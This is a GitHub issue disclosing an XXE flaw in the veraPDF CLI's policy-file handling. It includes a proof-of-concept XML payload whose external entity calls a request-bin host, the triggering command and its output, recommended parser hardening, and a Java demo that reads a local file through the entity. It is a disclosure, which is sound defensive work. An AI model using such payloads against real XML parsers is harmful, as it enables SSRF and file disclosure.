Potential XXE(XML External Entity Injection) vulnerability in veraPDFCli #1488

Open
JAckLosingHeart opened this issue Nov 3, 2024 · 1 comment
JAckLosingHeart commented Nov 3, 2024

Hi team,

A malicious XML policy file passed to the veraPDF CLI can lead to XXE exploitation due to insecure use of the XML parser. The policy file is the attack payload, which is similar to the previously fixed issue #1415, but this vulnerability occurs at a different place within the CLI tool, even before the XSL transformation happens.

### POC
Installed the latest veraPDF, installer downloaded from the website:

```
PS C:\Users\samym\Documents\verapdf-poc> verapdf --version
veraPDF 1.26.2
Built: Sun May 19 13:33:00 CST 2024
Developed and released by the veraPDF Consortium.
Funded by the PREFORMA project.
Released under the GNU General Public License v3
and the Mozilla Public License v2 or later.
```

Malicious policy file, which doesn't have to be an XSL file to be parsed, poc.xml:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://eo9k3koijwh1jvr.m.pipedream.net/poc">]>
<root>&xxe;</root>
```

https://eo9k3koijwh1jvr.m.pipedream.net is a malicious website I set up to log incoming requests, for demo purposes only.

And prepare any PDF, named test.pdf.
Execute:

```
PS C:\Users\samym\Documents\verapdf-poc> verapdf --policyfile .\poc.xml .\test.pdf
Exception in thread "main" org.verapdf.core.VeraPDFException: Policy file extension must be one of sch, xsl, or xslt
        at org.verapdf.policy.PolicyChecker.applyPolicy(PolicyChecker.java:125)
        at org.verapdf.cli.VeraPdfCliProcessor.applyPolicy(VeraPdfCliProcessor.java:247)
        at org.verapdf.cli.VeraPdfCliProcessor.processPaths(VeraPdfCliProcessor.java:107)
        at org.verapdf.cli.VeraPdfCli.singleThreadProcess(VeraPdfCli.java:142)
        at org.verapdf.cli.VeraPdfCli.main(VeraPdfCli.java:111)
        at org.verapdf.apps.GreenfieldCliWrapper.main(GreenfieldCliWrapper.java:54)
```

Though there was an exception when applying the policy, the vulnerability can still be triggered before that.
I could see the request come in on my request bin anyway:
(screenshot)

This vulnerability could be further exploited and lead to information leak, SSRF and possibly RCE.

### Root cause analysis:
The problem is actually inside the function mergeEnabledFeaturesFromPolicy under org.verapdf.apps.utils.ApplicationUtils:
https://github.com/veraPDF/veraPDF-apps/blob/v1.27.88/gui/src/main/java/org/verapdf/apps/utils/ApplicationUtils.java#L171
The policy file is parsed without secure processing enabled or external entities disabled, which leads to an XXE vulnerability. Also, this function is used not only by veraPDF CLI but in other places as well, which means there could be more attack surface.

### Recommendations:
Enable secure processing of XML files:

```java
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
```

Or disable all external entities:

```java
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
```
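The following is an added example and is not code from this report or from veraPDF. It is a self-contained Java program that reproduces the unsafe parse of a policy-shaped XML document beside a DocumentBuilderFactory hardened with the settings recommended above. To run offline it points the external entity at a local temp file instead of the remote request-bin URL; the class and method names (XxePolicyDemo, policyWithEntity, unsafeFactory, hardenedFactory, rootText) are assumptions of this example and do not exist in veraPDF, and mergeEnabledFeaturesFromPolicy is not called.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.SAXParseException;

public class XxePolicyDemo {

    // Constructed input with the same shape as poc.xml above, but the entity's
    // SYSTEM identifier is a local file URI so the demo needs no network access.
    static String policyWithEntity(Path target) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n"
             + "<!DOCTYPE root [<!ENTITY xxe SYSTEM \"" + target.toUri() + "\">]>\n"
             + "<root>&xxe;</root>\n";
    }

    // The unsafe pattern: a factory with default settings, which resolves
    // external general entities when the document is parsed.
    static DocumentBuilderFactory unsafeFactory() {
        return DocumentBuilderFactory.newInstance();
    }

    // Hardened factory applying both recommendations from the report. An unknown
    // feature name makes setFeature throw ParserConfigurationException; that is
    // deliberately left to propagate rather than silently falling back to defaults.
    static DocumentBuilderFactory hardenedFactory() throws ParserConfigurationException {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setXIncludeAware(false);          // XInclude is another way to pull in external content
        dbf.setExpandEntityReferences(false); // redundant once the DOCTYPE is rejected, but harmless
        return dbf;
    }

    // Parse the document with the given factory and return the root element's text,
    // which is where an expanded external entity would end up.
    static String rootText(DocumentBuilderFactory dbf, String xml) throws Exception {
        DocumentBuilder db = dbf.newDocumentBuilder();
        Document doc = db.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        return doc.getDocumentElement().getTextContent();
    }

    public static void main(String[] args) throws Exception {
        // Stand-in for a sensitive local file the attacker wants to read.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "top-secret-token");
        String xml = policyWithEntity(secret);

        // 1. Default factory: the entity is resolved and the file content lands in the DOM.
        System.out.println("unsafe parse   : " + rootText(unsafeFactory(), xml));

        // 2. Hardened factory: the DOCTYPE itself is rejected before any entity is fetched.
        try {
            rootText(hardenedFactory(), xml);
            System.out.println("hardened parse : unexpectedly succeeded");
        } catch (SAXParseException e) {
            System.out.println("hardened parse : rejected (" + e.getMessage() + ")");
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with `javac XxePolicyDemo.java && java XxePolicyDemo` (Java 11 or later, for Files.writeString). With the JDK's built-in parser the first line prints the temp file's contents, showing the same entity resolution that produced the request-bin hit above, and the second reports a SAXParseException at the DOCTYPE declaration. Whether FEATURE_SECURE_PROCESSING alone blocks external DTD access depends on the XML implementation in use, so when policy files never legitimately carry a DOCTYPE, rejecting it outright with disallow-doctype-decl is the simpler setting to reason about.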
@MaximPlusov MaximPlusov self-assigned this Nov 3, 2024
@MaximPlusov MaximPlusov added this to the 1.28 milestone Nov 5, 2024
@JAckLosingHeart (Author)

Hi team! Thank you for addressing and fixing the security issue I reported. To help other users identify and understand the implications of this fix, could we consider requesting a CVE number for this vulnerability? This would make it easier for users to track and assess any related security concerns.
